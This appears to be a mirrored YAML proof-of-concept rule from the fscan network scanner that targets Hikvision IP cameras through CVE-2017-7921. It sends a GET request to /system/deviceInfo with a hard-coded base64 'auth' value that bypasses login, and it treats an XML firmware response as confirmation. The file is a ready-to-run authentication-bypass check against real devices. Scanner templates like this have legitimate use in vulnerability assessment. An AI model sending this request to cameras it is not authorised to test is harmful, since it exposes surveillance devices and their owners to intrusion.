mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-11-05 10:45:27 +00:00
11 lines
442 B
YAML
11 lines
442 B
YAML
|
|
name: poc-yaml-hikvision-cve-2017-7921
|
||
|
|
rules:
|
||
|
|
- method: GET
|
||
|
|
path: /system/deviceInfo?auth=YWRtaW46MTEK
|
||
|
|
follow_redirects: false
|
||
|
|
expression: |
|
||
|
|
response.status == 200 && response.body.bcontains(b"<firmwareVersion>") && response.headers["content-type"] == "application/xml"
|
||
|
|
detail:
|
||
|
|
author: whwlsfb(https://github.com/whwlsfb)
|
||
|
|
links:
|
||
|
|
- https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html
|